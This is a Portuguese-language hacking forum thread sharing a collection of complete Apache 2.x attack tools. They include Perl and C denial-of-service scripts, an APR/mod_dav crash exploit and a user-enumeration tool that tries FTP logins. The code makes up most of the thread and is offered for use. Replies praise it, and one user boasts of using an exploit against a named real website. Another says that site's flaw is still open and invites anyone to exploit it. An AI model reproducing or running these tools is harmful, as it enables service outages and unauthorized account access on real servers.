FORUM DARKERS

hehehe espero que aproveitem essa bela coleção de exploits pra Apache 2.x ;) ;) ;) ;)

Apache 2.0.49 ou menor
Ataque do tipo DoS
Headers HTTP Longos

#/usr/bin/perl -w

use IO::Socket::INET;

usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);

sub usage
{
print "\n***********************************************";
print "\n Apache HTTPd Arbitrary Long HTTP Headers DoS \n";
print " Tested Versions : 2 < 2.0.49 \n";
print " Adv : http://www.guninski.com/httpd1.html \n";
print " By  : Qnix ,  Q-nix[at]hotmail[dot]com \n";
print "***********************************************\n\n";
print "Usage: apache_ap_get_dos.pl [Host] [Port]\n\n";
exit(1);
}

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

binmode($sock);

$hostname="Host: $host";

$buf2='A'x50;
$buf4='A'x8183;

$len=length($buf2);

$buf="GET / HTTP/1.1\r\n";

send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
   $buf=" $buf4\r\n";
   send($sock,$buf,0) || die "send error:$@, target maybe have been
DoS?\n";
}

$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, the buffer sent to the target \n";
close($sock);

# milw0rm.com [2005-06-20]





Apache 2.0.52 ou menor
Ataque do Tipo DoS
Requisição GET

#!/usr/bin/perl

# Based on ->
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#             
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:\perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->   
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings ->
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things. 
#
# Shit ->
#             My English now is bulls shit :( I try study it :)
#           

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "\n ::: ---------------------------------------------- :::\n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::\n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::\n";
   print " ::: Coded by GreenwooD from Network Security Team  :::\n";
   print " ::: ---------------------------------------------- :::\n";
   exit();
  }

print "\n <+> Prepare to start connect.\n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(\n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]\n";
print " <+> Send of first part of devil header.\n";   
 
  print $s "GET / HTTP/1.0\n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.\n";
print " <+> Start DoS send second part of devil header.\n";   
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "\n");

   
      if ($i % 500 == 0)
        {
         print "=";
        } 

     ++$i;

    } until ($i == $trys);


print "> <EOD>\n";

close($s);

print " <+> Ok now target web server maybe DoSeD.\n";

# milw0rm.com [2005-03-04]













Apache 2.0.52 ou menor
Ataque do tipo DoS
Multiplos Headers

/*
Apache Squ1rt, Denial of Service Proof of Concept
Tested on Apache 2.0.52

j0hnylightning@gmail.com
dguido@gmail.com

Sends a request that starts with:
GET / HTTP/1.0\n
8000 spaces \n
8000 spaces \n
8000 spaces \n
...
8000 times

Apache never kills it. Takes up huge amounts of
RAM which increase with each connection.

Original credit goes to Chintan Trivedi on the
FullDisclosure mailing list:
http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html

More info:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

Versions between 2.0.35 and 2.0.52 may be vulnerable,
but only down to 2.0.50 was tested.

This attack may be preventable with a properly configured
iptables ruleset. Gentoo already has a patch out in the
2.0.52-r1 release in the file 06_all_gentoo_protocol.patch

v2
Rewritten to use pthread.
gcc apache-squ1rt.c -lpthread
*/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>
#define DEST_PORT 80

void *squirtIt(char *hName);

char attackBuf[8000];
char letsGetStarted[128];

int main(int argc, char **argv){
       int num_connect;
       int ret;
       pthread_t tid[35];

       sprintf(letsGetStarted, "GET / HTTP/1.0\n");
       memset(attackBuf, ' ', 8000);
       attackBuf[7998]='\n';
       attackBuf[7999]='\0';

       if (argc != 2){
               fprintf(stderr, "Usage: %s <host name> \n", argv[0]);
               exit(1);
       }

       for(num_connect = 0; num_connect < 35; num_connect++){
               ret = pthread_create(&tid[num_connect], NULL, (void *)squirtIt, argv[1]);
       }

       /* assuming any of these threads actually terminate, this waits for
all of them */
       for(num_connect = 0; num_connect < 35; num_connect++){
               pthread_join(tid[num_connect], NULL);
       }

 return 0;
}

void *squirtIt(char *hName){
       int sock, i;
       struct hostent *target;
       struct sockaddr_in addy;

       if((target = gethostbyname(hName)) == NULL){
               herror("gethostbyname()");
               exit(1);
       }

       if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
               perror("socket()");
               exit(1);
       }

       addy.sin_family = AF_INET;
       addy.sin_port = htons(DEST_PORT);
       bcopy(target->h_addr, (char *)&addy.sin_addr, target->h_length );
       memset(&(addy.sin_zero), '\0', 8);

       if((connect(sock, (struct sockaddr*)&addy, sizeof(addy))) < 0){
               perror("connect()");
               exit(1);
       }

       send(sock, letsGetStarted, strlen(letsGetStarted), 0);

       for(i=0; i < 8000; i++){
               send(sock, attackBuf, strlen(attackBuf), 0);
       }

       close(sock);
}

// milw0rm.com [2004-11-18]





Apache 2.0.52 ou menor
Tipo DoS
Mesmo que o de cima só que em Perl


#!/usr/bin/perl
# Noam Rathaus of Beyond Security Ltd.
#

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";

$socket->autoflush(1);

print "Sending...\n";

print $socket "GET / HTTP/1.0\n";

for (my $count = 0; $count < 8000; $count++)
{
 if ($count % 10 == 0)
 {
  print ".";
 }
 print $socket (" "x8000)."\n";
}

print $socket "\n";

print "Done.\n";

while (<$socket>)
{
 print $_;
}

close($socket);
exit(0);

sub usage
{
 print "\nApache 2.0.52 8000x\" \" DoS attack\n";
 print "\nUsage: apache_xpl.pl [host] [port]\n";
 print "\n";
 exit(1);
}

# milw0rm.com [2004-11-02]












Apache 2.0.48 ou menor
Tipo de ataque Brute Force


Exemplo de site bugado: INVASAO.COM.BR
hehehe descobri isso testando o exploit hehehe só que eu n tinha uma boa lista =(

/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21

int m00() {
printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n[*] Downloaded on www.K-OTIK.com\n\n");
}

int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}

int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}

int attempt(char *argv);

int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}


int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;

char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;

m00();

if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}

if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }

if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}

if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}

logz = (char **)malloc(0x666);

printf("[*] Checking http server [%s:%i]...\n",host,port);

hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);

hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);

printf("\n[*] Searching for system accounts...");

if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}

x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;

printf("\n %s \t=> ",buf);


hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n[*] Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf("[*] Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);

sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf("[*] Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}

}
/* m00 */

// milw0rm.com [2003-12-06]










Apache 2.0.45 ou menor
APR

#!/usr/bin/perl
#
# Apache 2.0.37 - 2.0.45 APR Exploit
# Written By Matthew Murphy
#
# This Perl script will successfully exploit any un-patched Apache 2.x
# servers.
#

# Base64 Encoder
#
# If you want authentication with the server via HTTP's lame Basic
# auth, put the proper string to encode BASE64 content, and use
# '%s' to represent the credentials being encoded.  For instance:
#
# base64 %s
#
# would result in:
#
# base64 userid:password
#
# If your decoder requires you to use STDIN to pass the password
# (no pun intended), set $BASE64_USE_STDIN to nonzero and do not
# use '%s' on the command-line.
$BASE64_CMD_STRING = "use_base64_encoder_here %s";

# Base64 encoder piping
#
# If your encoder requires the password to be written to STDIN,
# set this to a nonzero value.  NOTE: This requires support for
# bi-directional pipes on your OS version.
$BASE64_USE_STDIN = 0;

# Base64 encoder input handling
#
# If your encoder requires a newline after your credentials,
# set this to your newline character.
$BASE64_WRITE_NL = "";

use IO::Socket;
print STDOUT "Apache 2.0 APR Exploit\r\n";
print STDOUT "By Matthew Murphy\r\n\r\n";
print STDOUT "Enter the hostname/IP address of the server: ";
$line = <STDIN>;
$host = mychomp($line);
print STDOUT "Enter the port of the server \[80\]: ";
$line = <STDIN>;
$port = mychomp($line);
print STDOUT "Use authentication credentials for the session \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print STDOUT "What username shall we use: ";
$line = <STDIN>;
$user = mychomp($line);
print STDOUT "What password shall we use: ";
$line = <STDIN>;
$pass = mychomp($line);
$auth = "$user:$pass";
if ($BASE64_USE_STDIN) {
# l33t Perl piping trix; NOTE: This is definitely
# Alpha code! :-)
pipe(STDOUTREAD, STDOUTWRITE);
pipe(STDINREAD, STDINWRITE);
open(OLDSTDIN, "&STDIN");
open(OLDSTDOUT, ">&STDOUT");
open(STDIN, "&STDINREAD");
open(STDOUT, ">&STDOUTWRITE");
close(STDINREAD);
close(STDOUTWRITE);
system($BASE64_CMD_STRING);
open(STDIN, "&OLDSTDIN");
open(STDOUT, "&>OLDSTDOUT");
close(OLDSTDIN);
close(OLDSTDOUT);
print STDINWRITE $auth;
close(STDINWRITE);
read(STDOUTREAD, $base64, 4096); # Edit for insane passwords
close(STDOUTREAD);
} else {
open(READOUTPUT, sprintf($BASE64_CMD_STRING, $auth)."|");
read(READOUTPUT, $base64, 4096); # See above
close(READOUTPUT);
}
# Another hack for dealing with base64 encoders that output
# multi-lined encoded text.  HTTP specifically calls for a
# single line.  Note that this pattern also messes with spaces,
# tabs, etc., but base64 doesn't use those either, so this
# shouldn't matter.
$base64 = join("", split(/ /, $base64));
} else {
$base64 = undef;
}
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"127.0.0.1");
print STDOUT "Exploiting a proxy server \[Y/N\]? ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
print $f "GET / HTTP/1.1\x0d\x0a";

# Apache 2.0 tries to limit header inputs, but uses a hash table
# that ultimately concatenates multiple headers of the same name
# together with ", " between them, so:
#
# Host: a
# Host: b
#
# Bypasses Apache's buffer size checks, but ends up as:
#
# Host: a,b
#
# When processed.  Confirm this with a TRACE against your server:
#
# TRACE / HTTP/1.1
# Host: a
# Host: b
#
# The "message/http" body you receive will contain:
#
# TRACE / HTTP/1.1
# Host: a,b
#
# So, for those of you who are confused by this code fragment,
# this is what it ultimately achieves!
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Proxy-Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
} else {
print STDOUT "What resource should be probed: ";
$line = <STDIN>;
$res = mychomp($line);
print STDOUT "Exploit a DAV repository for this attack? \[Y/N\] ";
$line = <STDIN>;
$char = mychomp($line);
if ($char == "Y" || $char == "y") {
# WARNING:
# Another section of alpha code here; mod_dav tends to barf
# if given the smallest inconsistency, and this is not
# exactly well-researched.  If this doesn't work for you,
# target your DAV repository as a typical resource: if
# UseCanonicalName On hasn't been set explicitly, mod_dav
# will choke on that as well.
#
# STunnel should not have issues with this, as you can't
# use a "Host" header in an SSL connection anyway, so
# that is no problem.
#
# Note that if the body is too long, IIS servers will also
# die (assuming of course, that the latest IIS cumulative
# patch has not been applied), as they have had problems
# dealing with WebDAV in the very recent past.

# XML Body of Request
#
# If everything works, mod_dav will attempt to format a
# message with apr_psprintf() to indicate that our
# namespace is invalid, leading to a crash.
$xmlbody = "<?xml version=\"1.0\"?>\r\n";
$xmlbody.= "<D:propfind xmlns:D=\"".("A"x20000)."\:\">\r\n";
$xmlbody.= "\x20\x20\x20\x20<D:allprop/>\r\n";
$xmlbody.= "</D:propfind>";

# HTTP headers
print $f "PROPFIND $res HTTP/1.1\r\n";
print $f "Host: $host:$port\r\n";
print $f "Depth: 1\r\n";
print $f "Content-Type: text/xml; charset=\"utf-8\"\r\n";
print $f "Content-Length: ".length($body)."\r\n\r\n";
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "$xmlbody\r\n\r\n";
} else {
# This does *almost* the exact same thing as the mod_proxy
# code, and could be considered wasteful, but a few extra
# CPU cycles never killed anybody. :-(
print $f "GET $res HTTP/1.1\r\n";
for ($i = 0; $i < 10; $i++) {
print $f "Host: ".("A"x2000)."\r\n";
}
if (defined($base64)) {
print $f "Authorization: Basic ".$base64."\r\n";
}
print $f "\r\n";
}
}
while (defined($ln = <$f>)) {
print STDOUT $ln;
}
undef $f;
exit;

# FIXED: The perl chomp() function is broken on my distro,
# so I hacked a fix to work around it.  This note applies
# to ActivePerl 5.8.x -- I haven't tried others.  This is
# another hackish fix, which seems to be the entire style
# of this code.  I'll write better toys when I have time to
# write better toys.
sub mychomp {
my $data;
my $arg = shift;
my $CRLF;
if ($^O == "MSWin32") {
$CRLF = 1;
} else {
$CRLF = 0;
}
$data = substr($arg, 0, length($arg) - $CRLF);
return $data;
}


# milw0rm.com [2003-06-08]











Apache 2.0.44 em plataforma LINUX
Linux exploit remoto

/******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
*
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
*
*
* Daniel Nyström <exce@netwinder.nu> *
*
* - www.telhack.tk - *
*
******************************************************** th-apachedos.c ********/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>


int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n");
printf("->\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

for (count = 0; count < 8000000;)
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);

printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("->\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
}


close(sockfd);

printf("-> Finished smoothly, check hosts apache...\n\n");
}

// milw0rm.com [2003-04-11]











Apache 2.x
Memory Leak Exploit


#ifndef _WIN32
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <fcntl.h>
#else
#include <windows.h>
#pragma comment(lib, "wsock32.lib")
#endif
#include <stdlib.h>
#include <stdio.h>

int sig_fired = 0;

#ifndef _WIN32
void sig_handler(int sig) {
#else
BOOL WINAPI sig_handler(DWORD dwCtrlType) {
#endif
sig_fired = 1;
#ifndef _WIN32
return;
#else
return TRUE;
#endif
}

int main(int argc, char *argv[]) {
SOCKET s;
struct sockaddr_in sin;
char buffer[1025];
struct hostent *he;
unsigned short iPort = 80;
int newlines = 100;
char *p;
char *p2;
int i;
#ifdef _WIN32
WSADATA wsa_prov;
#endif
printf("Apache Massacre v1.0\r\n");
printf("Exploit by Matthew Murphy\r\n");
printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
#ifdef _WIN32
if (WSAStartup(0x0101, &wsa_prov)) {
perror("WSAStartup");
exit(1);
}
#endif
printf("Please enter the web server's host/IP: ");
fgets(&buffer[0], 1024, stdin);
he = gethostbyname(&buffer[0]);
if (!he) {
perror("gethostbyname");
exit(1);
}
sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
printf("Please enter the web server's port: ");
fgets(&buffer[0], 1024, stdin);
iPort = (unsigned short)atoi(&buffer[0]);
#ifndef _WIN32
#ifdef _SOLARIS
sigset(SIGINT, &sig_handler);
#else
signal(SIGINT, &sig_handler);
#endif
#else
SetConsoleCtrlHandler(&sig_handler, TRUE);
#endif
printf("How many newlines should be in each request [100]: ");
fgets(&buffer[0], 1024, stdin);
if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
newlines = atoi(&buffer[0]);
}
p = malloc(newlines*2);
p2 = p;
for (i = 0; i < newlines; i++) {
*p2 = 0x0D;
p2++;
*p2 = 0x0A;
p2++;
}
newlines += newlines;
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
perror("socket");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(iPort);
if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
perror("connect");
exit(1);
}
while (1) {
if (!send(s, (char *)p, newlines, 0) == newlines) {
perror("send");
exit(1);
}
if (sig_fired) {
printf("Terminating on SIGINT");
free(p);
#ifndef _WIN32
close(s);
#else
closesocket(s);
WSACleanup();
#endif
exit(0);
}
}
}


// milw0rm.com [2003-04-09]






Hehehehehe flws

Espero ter ajudado

afinal vive pessoas pedindo xpl's pra apache né...

aí estão

E ae Slul, muito bom o post, muito booom mesmo! Parabéns, e sem travas!

Merece +++!

...by Cloudy

Ótimos Exploits.

Meus parabéns, fez um ótimo post.

HadeS

ai está a foto de eu usando um dos exploits com sucesso =)


(//http://img506.imageshack.us/img506/7097/invcombr5xy.png)



huahuahuauhauhauha viram o site q tah vul?


=P

mto bom mesmo kra!
parabens tbm!

Parabéns..

ah e ah respeito do site do invasao um dia ele jah foi bom hoje em dia só eh usado para promover cursos o fuctura soh posta escrevendo sobre o curso dele ou "www.invasao.com.br"

infelizmente aquele fórum é um lixo..

mas já foi referência..
é uma pena que deixaram piorar tanto

Quote from: "slul"Espero ter ajudado

afinal vive pessoas pedindo xpl's pra apache né...

aí estão

Concerteza ajudou ^^ nem preciso dizer o quanto eh util
valeww Slul

É Dr4k0, pra vc ter uma noção, os caras não tem nem humildade. Pra vcs terem uma idéia, eles foram avisados de uma falha, e como retribuem?!?

Vejam:

Quote(15:36:20) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: E uma coisinha...
(15:36:54) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Assim como tivemos uma atitude legal de alertar da falha, seria legal um Greetz
(15:37:02) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Uma agradecimento
(15:37:06) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Troca de favores
(15:37:08) Fuctura  -  Bom Dia, n, ótimo dia: mas eu agradeci
(15:37:09) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Não é nada demais
(15:37:18) Fuctura  -  Bom Dia, n, ótimo dia: e ao cara tb
(15:37:36) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Digo em público
(15:37:38) Fuctura  -  Bom Dia, n, ótimo dia: acabei de agradecer a vc
(15:38:57) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Um defacer quando owna alguma coisa, ele deixa sua marca. Nós não ownamos, nem queremos deixar nossa marca na marra
(15:39:05) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Mas um pouco de status não caí mal
(15:39:31) Fuctura  -  Bom Dia, n, ótimo dia: isso quem deveria fazer eh o alvoro do provedor. Entendo q isso eh bom pro ego, mas sempre digo q oq se da de graca eh oq se espera nada em troca.

Tive problemas com muitos que trabalharam comigo, e ainda to tendo, pq n entende q se pode fazer na boa faca. Sempre querem promocao em troca.

Vc eh bom, pense no retorno profissoinal q vc pode ter com materias e servicos q pode prestar
(15:39:48) Fuctura  -  Bom Dia, n, ótimo dia: em troca posso recomendar algum projeto seu, ve ai depois
(15:39:56) Fuctura  -  Bom Dia, n, ótimo dia: eu realmente agora tenho q sair pq vo pra fuctura trabalhar
(15:40:00) Fuctura  -  Bom Dia, n, ótimo dia: valeu
(15:40:02) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: OK
(15:40:15) Cloudy - Darkers Team 2006 [ wWw.Darkers.com.br (http://www.darkers.com.br) ]: Boa sorte

A falha está lá até agora, e quem quiser usurfruir, basta rodar o seguinte exploit:

/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
